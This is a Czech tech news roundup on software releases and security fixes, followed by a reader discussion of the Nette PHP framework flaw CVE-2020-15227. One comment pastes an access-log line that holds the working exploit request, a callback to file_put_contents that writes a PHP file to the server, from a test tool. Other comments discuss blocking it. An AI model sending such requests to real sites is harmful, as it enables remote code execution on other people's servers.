Memtest86+ (Wikipedie), svobodný nástroj pro kontrolu operační paměti, byl vydán ve verzi 8.00. Přináší podporu nejnovějších procesorů Intel a AMD nebo také tmavý režim.
Programovací jazyk Racket (Wikipedie), tj. jazyk z rodiny jazyků Lisp a potomek jazyka Scheme, byl vydán v nové major verzi 9.0. Hlavní novinku jsou paralelní vlákna (Parallel Threads).
Před šesti týdny bylo oznámeno, že Qualcomm kupuje Arduino. Minulý týden byly na stránkách Arduina aktualizovány podmínky používání a zásady ochrany osobních údajů. Objevily se obavy, že by otevřená povaha Arduina mohla být ohrožena. Arduino ubezpečuje, že se nic nemění a například omezení reverzního inženýrství v podmínkách používání se týká pouze SaaS cloudové aplikace.
Knihovna libpng, tj. oficiální referenční knihovna grafického formátu PNG (Portable Network Graphics), byla vydána ve verzi 1.6.51. Opraveny jsou 4 bezpečnostní chyby obsaženy ve verzích 1.6.0 (vydána 14. února 2013) až 1.6.50. Nejvážnější z chyb CVE-2025-65018 může vést ke spuštění libovolného kódu.
Nové číslo časopisu Raspberry Pi zdarma ke čtení: Raspberry Pi Official Magazine 159 (pdf).
Hru Warhammer: Vermintide 2 (ProtonDB) lze na Steamu získat zdarma napořád, když aktivaci provedete do pondělí 24. listopadu.
Virtualizační software Xen (Wikipedie) byl vydán v nové verzi 4.21. Podrobnosti v poznámkách k vydání a přehledu nových vlastností.
Evropská komise schválila český plán na poskytnutí státní pomoci v objemu 450 milionů eur (téměř 11 miliard Kč) na rozšíření výroby amerického producenta polovodičů onsemi v Rožnově pod Radhoštěm. Komise o tom informovala v dnešní tiskové zprávě. Společnost onsemi by podle ní do nového závodu v Rožnově pod Radhoštěm měla investovat 1,64 miliardy eur (téměř 40 miliard Kč).
Microsoft v příspěvku na svém blogu věnovaném open source oznámil, že textové adventury Zork I, Zork II a Zork III (Wikipedie) jsou oficiálně open source pod licencí MIT.
První prosincový týden proběhne SUSE Hack Week 25. Zaměstnanci SUSE mohou věnovat svůj pracovní čas libovolným open source projektům, například přidání AI agenta do Bugzilly, implementaci SSH v programovacím jazyce Zig nebo portaci klasických her na Linux. Připojit se může kdokoli.
V Nette (Wikipedie), tj. open source frameworku pro tvorbu webových aplikací v PHP, byla nalezena a opravena bezpečnostní chyba CVE-2020–15227 potenciálně umožňující vzdálené spuštění kódu.
Tiskni
Sdílej:
Nechci zveřejňovat přesný postup zneužití chyby a doufám, že to ani nikdo jiný neudělá.
Tohle je pro mne bezcenný článek a zprávička. Těšil jsem se, že se dozvím detaily a třeba i na co si dávat pozor, ale nic.
Pokud jde o uživatele Nette, tak k těm, to snad doputuje jako normální bezpečnostní aktualizace případně e-mailem.
Když už psát články a zprávičky, tak ať se z toho člověk aspoň něco naučí – tzn. rozbor, jak chyba funguje, proč k ní došlo a jak ji příště neopakovat. Stejně tak by se hodilo napsat, jakou metodu použil ten, kdo chybu objevil (jestli používal nějaký automatický software na hledání chyb, nebo jestli automatizovaně analyzoval zdrojáky nebo jestli to hledal ručně…).
Alespoň ne v dohledné době, protože by tím způsobil ostatním nepříjemnosti a zpronevěřil se duchu open source.
Tohle píše člověk, který tvrdí, že open source je komunismus a nefunguje…
Dle #18 by mělo stačit zablokovat jedno URL nebo URL odpovídající jednomu regulárnímu výrazu. Což se dá udělat na nějaké společné reverzní proxy nebo v tom ModSecurity. Tedy alespoň pokud tento GET požadavek je jediný způsob, jak tuto chybu zneužít.
<?php
die("php");
call_user_func_array pri pouziti App\Presenters\MicroPresenter jako rodice presenteru aplikace...
https://salamek.cz/nette-test.php?url=https://cvc.cz
misto https://cvc.cz dej domenu sveho webu
78.80.161.207 ceskaprehrada.cz - [07/Oct/2020:20:22:15 +0200] "GET /nette.micro?callback=file_put_contents&filename=delete_me_96c9ce10c6293b869039493c9d727263.php&data=%3C%3Fphp+echo+base64_decode%28%27OTZjOWNlMTBjNjI5M2I4NjkwMzk0OTNjOWQ3MjcyNjM%3D%27%29%3B+%40unlink%28%27delete_me_96c9ce10c6293b869039493c9d727263.php%27%29%3B+%2F%2FNette+CVE-2020-15227+test+tool+https%3A%2F%2Fsalamek.cz%2Fnette-test.php%2C+if+you+see+this+file%2C+you+should+update+nette%2Fapplication+ASAP HTTP/1.0" 404 341 "-" "-" 78.80.161.207 ceskaprehrada.cz - [07/Oct/2020:20:22:15 +0200] "GET /delete_me_96c9ce10c6293b869039493c9d727263.php HTTP/1.0" 404 341 "-" "-"
, instalovat Nette se mi kvůli tomu fakt nechce (používal jsem jenom samostatné Nette Form. Taky nevím co se stane když nemáte rewrite na tu URL.
Dále jsem prošel access log a nikdo nic s "nette" nepožadoval, takže nevypadá, že by se to masově skenovalo.